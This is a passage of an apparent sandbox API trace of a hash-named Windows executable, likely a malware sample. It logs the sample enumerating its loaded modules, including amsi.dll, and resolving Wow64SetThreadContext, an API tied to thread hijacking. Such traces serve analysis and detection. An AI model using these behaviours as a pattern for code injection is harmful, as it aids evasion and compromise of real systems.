lpBaseName="OLEAUT32.dll") returned 0xc [0166.803] CoTaskMemFree (pv=0x8b4098) [0166.803] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.803] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75b00000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0166.804] CoTaskMemFree (pv=0x8b4098) [0166.804] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6ad40000, lpmodinfo=0x23d7ef0, cb=0xc | out: lpmodinfo=0x23d7ef0*(lpBaseOfDll=0x6ad40000, SizeOfImage=0x9ac000, EntryPoint=0x0)) returned 1 [0166.805] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.805] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6ad40000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0166.806] CoTaskMemFree (pv=0x8b4098) [0166.806] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.806] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6ad40000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\cc4e5d110dd318e8b7d61a9ed184ab74\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\cc4e5d110dd318e8b7d61a9ed184ab74\\system.ni.dll")) returned 0x64 [0166.807] CoTaskMemFree (pv=0x8b4098) [0166.807] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c4c0000, lpmodinfo=0x23da08c, cb=0xc | out: lpmodinfo=0x23da08c*(lpBaseOfDll=0x6c4c0000, SizeOfImage=0x18d000, EntryPoint=0x0)) returned 1 [0166.808] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.808] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c4c0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Drawing.ni.dll") returned 0x15 [0166.811] CoTaskMemFree (pv=0x8b4098) [0166.811] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.811] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c4c0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\system.drawing.ni.dll")) returned 0x74 [0166.812] CoTaskMemFree (pv=0x8b4098) [0166.813] GetModuleInformation (in: hProcess=0x2e4, hModule=0x68bf0000, lpmodinfo=0x23dc364, cb=0xc | out: lpmodinfo=0x23dc364*(lpBaseOfDll=0x68bf0000, SizeOfImage=0xc59000, EntryPoint=0x0)) returned 1 [0166.813] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.813] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x68bf0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Windows.Forms.ni.dll") returned 0x1b [0166.856] CoTaskMemFree (pv=0x8b4098) [0166.856] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.856] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x68bf0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\8cd2187094ba6cade0ca0fab4f932654\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\8cd2187094ba6cade0ca0fab4f932654\\system.windows.forms.ni.dll")) returned 0x80 [0166.856] CoTaskMemFree (pv=0x8b4098) [0166.857] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c7b0000, lpmodinfo=0x23de554, cb=0xc | out: lpmodinfo=0x23de554*(lpBaseOfDll=0x6c7b0000, SizeOfImage=0x92000, EntryPoint=0x6c7bdd60)) returned 1 [0166.857] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.857] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c7b0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0166.858] CoTaskMemFree (pv=0x8b4098) [0166.858] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.858] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c7b0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")) returned 0x78 [0166.859] CoTaskMemFree (pv=0x8b4098) [0166.859] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6f730000, lpmodinfo=0x23e0718, cb=0xc | out: lpmodinfo=0x23e0718*(lpBaseOfDll=0x6f730000, SizeOfImage=0x1d000, EntryPoint=0x6f733b10)) returned 1 [0166.860] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.860] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f730000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0166.861] CoTaskMemFree (pv=0x8b4098) [0166.861] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.861] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f730000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")) returned 0x1e [0166.862] CoTaskMemFree (pv=0x8b4098) [0166.862] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c3f0000, lpmodinfo=0x23e2824, cb=0xc | out: lpmodinfo=0x23e2824*(lpBaseOfDll=0x6c3f0000, SizeOfImage=0xc5000, EntryPoint=0x0)) returned 1 [0166.863] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.863] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c3f0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Runtime.Remoting.ni.dll") returned 0x1e [0166.864] CoTaskMemFree (pv=0x8b4098) [0166.864] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.864] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c3f0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Runt73a1fc9d#\\8d483c399064a7bdd1f920630af5a265\\System.Runtime.Remoting.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.runt73a1fc9d#\\8d483c399064a7bdd1f920630af5a265\\system.runtime.remoting.ni.dll")) returned 0x83 [0166.865] CoTaskMemFree (pv=0x8b4098) [0166.865] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6d300000, lpmodinfo=0x23e4a20, cb=0xc | out: lpmodinfo=0x23e4a20*(lpBaseOfDll=0x6d300000, SizeOfImage=0xd000, EntryPoint=0x6d3063e0)) returned 1 [0166.866] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.866] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d300000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="amsi.dll") returned 0x8 [0166.867] CoTaskMemFree (pv=0x8b4098) [0166.867] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.867] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d300000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll")) returned 0x1c [0166.868] CoTaskMemFree (pv=0x8b4098) [0166.868] GetModuleInformation (in: hProcess=0x2e4, hModule=0x684d0000, lpmodinfo=0x23e6b24, cb=0xc | out: lpmodinfo=0x23e6b24*(lpBaseOfDll=0x684d0000, SizeOfImage=0x712000, EntryPoint=0x0)) returned 1 [0166.869] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.869] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x684d0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0166.870] CoTaskMemFree (pv=0x8b4098) [0166.870] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.870] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x684d0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\abad45b9cc652ba7e38c4c837234c0ab\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\abad45b9cc652ba7e38c4c837234c0ab\\system.core.ni.dll")) returned 0x6e [0166.872] CoTaskMemFree (pv=0x8b4098) [0166.872] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74920000, lpmodinfo=0x23e8ce0, cb=0xc | out: lpmodinfo=0x23e8ce0*(lpBaseOfDll=0x74920000, SizeOfImage=0x6000, EntryPoint=0x74921460)) returned 1 [0166.872] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.872] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74920000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0166.873] CoTaskMemFree (pv=0x8b4098) [0166.873] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.873] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74920000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0166.875] CoTaskMemFree (pv=0x8b4098) [0166.875] CloseHandle (hObject=0x2e4) returned 1 [0166.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Wow64SetThreadContext", cchWideChar=21, lpMultiByteStr=0x19cb6c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Wow64SetThreadContextÚd", lpUsedDefaultChar=0x0) returned 21 [0166.875] GetProcAddress (hModule=0x74610000, lpProcName="Wow64SetThreadContext") returned 0x74653e60 [0166.888] GetCurrentProcessId () returned 0x1318 [0166.888] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1318) returned 0x2e4 [0166.888] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x23eb798, cb=0x100, lpcbNeeded=0x19cb68 | out: lphModule=0x23eb798, lpcbNeeded=0x19cb68) returned 1 [0166.889] GetModuleInformation (in: hProcess=0x2e4, hModule=0x400000, lpmodinfo=0x23eb8d8, cb=0xc | out: lpmodinfo=0x23eb8d8*(lpBaseOfDll=0x400000, SizeOfImage=0x76000, EntryPoint=0x0)) returned 1 [0166.890] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.890] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x400000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe") returned 0x44 [0166.890] CoTaskMemFree (pv=0x8b4098) [0166.890] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.890] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x400000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe")) returned 0x62 [0166.890] CoTaskMemFree (pv=0x8b4098) [0166.890] GetModuleInformation (in: hProcess=0x2e4, hModule=0x77110000, lpmodinfo=0x23edafc, cb=0xc | out: lpmodinfo=0x23edafc*(lpBaseOfDll=0x77110000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0166.899] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.899] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77110000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0166.899] CoTaskMemFree (pv=0x8b4098) [0166.899] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.899] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77110000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0166.899] CoTaskMemFree (pv=0x8b4098) [0166.899] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6d320000, lpmodinfo=0x23efc00, cb=0xc | out: lpmodinfo=0x23efc00*(lpBaseOfDll=0x6d320000, SizeOfImage=0x59000, EntryPoint=0x6d330780)) returned 1 [0166.899] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.900] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d320000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0166.901] CoTaskMemFree (pv=0x8b4098) [0166.901] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.901] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d320000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0166.901] CoTaskMemFree (pv=0x8b4098) [0166.901] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74610000, lpmodinfo=0x23f1d0c, cb=0xc | out: lpmodinfo=0x23f1d0c*(lpBaseOfDll=0x74610000, SizeOfImage=0xe0000, EntryPoint=0x74623980)) returned 1 [0166.902] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.902] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74610000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0166.902] CoTaskMemFree (pv=0x8b4098) [0166.902] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.902] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74610000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0166.903] CoTaskMemFree (pv=0x8b4098) [0166.903] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75710000, lpmodinfo=0x23f3e20, cb=0xc | out: lpmodinfo=0x23f3e20*(lpBaseOfDll=0x75710000, SizeOfImage=0x17e000, EntryPoint=0x757c1b90)) returned 1 [0166.903] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.903] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75710000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0166.903] CoTaskMemFree (pv=0x8b4098) [0166.903] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.903] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75710000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0166.904] CoTaskMemFree (pv=0x8b4098) [0166.904] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73d90000, lpmodinfo=0x23f5f68, cb=0xc | out: lpmodinfo=0x23f5f68*(lpBaseOfDll=0x73d90000, SizeOfImage=0x92000, EntryPoint=0x73dd0380)) returned 1 [0166.904] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.904] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73d90000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0166.904] CoTaskMemFree (pv=0x8b4098) [0166.904] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.904] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73d90000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0166.905] CoTaskMemFree (pv=0x8b4098) [0166.905] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74380000, lpmodinfo=0x23f8074, cb=0xc | out: lpmodinfo=0x23f8074*(lpBaseOfDll=0x74380000, SizeOfImage=0x7b000, EntryPoint=0x7439e970)) returned 1 [0166.905] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.905] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74380000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0166.905] CoTaskMemFree (pv=0x8b4098) [0166.905] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.906] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74380000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0166.906] CoTaskMemFree (pv=0x8b4098) [0166.906] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75a40000, lpmodinfo=0x23fa188, cb=0xc | out: lpmodinfo=0x23fa188*(lpBaseOfDll=0x75a40000, SizeOfImage=0xbe000, EntryPoint=0x75a75630)) returned 1 [0166.906] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.906] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75a40000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0166.907] CoTaskMemFree (pv=0x8b4098) [0166.907] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.907] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75a40000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0166.907] CoTaskMemFree (pv=0x8b4098) [0166.907] GetModuleInformation (in: hProcess=0x2e4, hModule=0x758c0000, lpmodinfo=0x23fc294, cb=0xc | out: lpmodinfo=0x23fc294*(lpBaseOfDll=0x758c0000, SizeOfImage=0x44000, EntryPoint=0x758d9d80)) returned 1 [0166.907] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.907] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x758c0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0166.908] CoTaskMemFree (pv=0x8b4098) [0166.908] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.908] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x758c0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0166.908] CoTaskMemFree (pv=0x8b4098) [0166.908] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75970000, lpmodinfo=0x23fe3ec, cb=0xc | out: lpmodinfo=0x23fe3ec*(lpBaseOfDll=0x75970000, SizeOfImage=0xad000, EntryPoint=0x75984f00)) returned 1 [0166.909] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.909] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75970000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0166.909] CoTaskMemFree (pv=0x8b4098) [0166.909] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.909] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75970000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0166.910] CoTaskMemFree (pv=0x8b4098) [0166.910] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73e40000, lpmodinfo=0x24004f8, cb=0xc | out: lpmodinfo=0x24004f8*(lpBaseOfDll=0x73e40000, SizeOfImage=0x1e000, EntryPoint=0x73e4b640)) returned 1 [0166.910] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.910] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73e40000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0166.910] CoTaskMemFree (pv=0x8b4098) [0166.910] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.910] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73e40000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0166.911] CoTaskMemFree (pv=0x8b4098) [0166.911] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73e30000, lpmodinfo=0x2402604, cb=0xc | out: lpmodinfo=0x2402604*(lpBaseOfDll=0x73e30000, SizeOfImage=0xa000, EntryPoint=0x73e32a00)) returned 1 [0166.912] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.912] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73e30000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0166.912] CoTaskMemFree (pv=0x8b4098) [0166.912] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.912] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73e30000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0166.913] CoTaskMemFree (pv=0x8b4098) [0166.913] GetModuleInformation (in: hProcess=0x2e4, hModule=0x77040000, lpmodinfo=0x2404718, cb=0xc | out: lpmodinfo=0x2404718*(lpBaseOfDll=0x77040000, SizeOfImage=0x58000, EntryPoint=0x770825c0)) returned 1 [0166.913] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.913] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77040000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0166.914] CoTaskMemFree (pv=0x8b4098) [0166.914] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.914] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77040000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0166.914] CoTaskMemFree (pv=0x8b4098) [0166.914] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c8d0000, lpmodinfo=0x240684c, cb=0xc | out: lpmodinfo=0x240684c*(lpBaseOfDll=0x6c8d0000, SizeOfImage=0x79000, EntryPoint=0x6c8df82a)) returned 1 [0166.915] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.915] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c8d0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0166.915] CoTaskMemFree (pv=0x8b4098) [0166.915] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.915] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c8d0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0166.916] CoTaskMemFree (pv=0x8b4098) [0166.916] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74a00000, lpmodinfo=0x2408994, cb=0xc | out: lpmodinfo=0x2408994*(lpBaseOfDll=0x74a00000, SizeOfImage=0x45000, EntryPoint=0x74a1de90)) returned 1 [0166.916] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.916] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74a00000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0166.917] CoTaskMemFree (pv=0x8b4098) [0166.917] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.917] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74a00000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0166.917] CoTaskMemFree (pv=0x8b4098) [0166.917] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74400000, lpmodinfo=0x240aaa0, cb=0xc | out: lpmodinfo=0x240aaa0*(lpBaseOfDll=0x74400000, SizeOfImage=0x1bd000, EntryPoint=0x744e2a10)) returned 1 [0166.918] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.918] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74400000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0166.918] CoTaskMemFree (pv=0x8b4098) [0166.918] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.919] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74400000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0166.919] CoTaskMemFree (pv=0x8b4098) [0166.919] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74a50000, lpmodinfo=0x240cbac, cb=0xc | out: lpmodinfo=0x240cbac*(lpBaseOfDll=0x74a50000, SizeOfImage=0x14f000, EntryPoint=0x74b06820)) returned 1 [0166.919] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.919] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74a50000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0166.920] CoTaskMemFree (pv=0x8b4098) [0166.920] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.920] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74a50000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0166.920] CoTaskMemFree (pv=0x8b4098) [0166.921] GetModuleInformation (in: hProcess=0x2e4, hModule=0x755c0000, lpmodinfo=0x240ed3c, cb=0xc | out: lpmodinfo=0x240ed3c*(lpBaseOfDll=0x755c0000, SizeOfImage=0x147000, EntryPoint=0x755d1cf0)) returned 1 [0166.921] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.921] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x755c0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0166.922] CoTaskMemFree (pv=0x8b4098) [0166.922] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.922] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x755c0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0166.922] CoTaskMemFree (pv=0x8b4098) [0166.922] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74990000, lpmodinfo=0x2410e48, cb=0xc | out: lpmodinfo=0x2410e48*(lpBaseOfDll=0x74990000, SizeOfImage=0x2b000, EntryPoint=0x74995680)) returned 1 [0166.923] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.923] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74990000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0166.923] CoTaskMemFree (pv=0x8b4098) [0166.924] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.924] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74990000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0166.924] CoTaskMemFree (pv=0x8b4098) [0166.924] GetModuleInformation (in: hProcess=0x2e4, hModule=0x77030000, lpmodinfo=0x2412f4c, cb=0xc | out: lpmodinfo=0x2412f4c*(lpBaseOfDll=0x77030000, SizeOfImage=0xc000, EntryPoint=0x77033930)) returned 1 [0166.925] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.925] GetModuleBaseNameW (in: 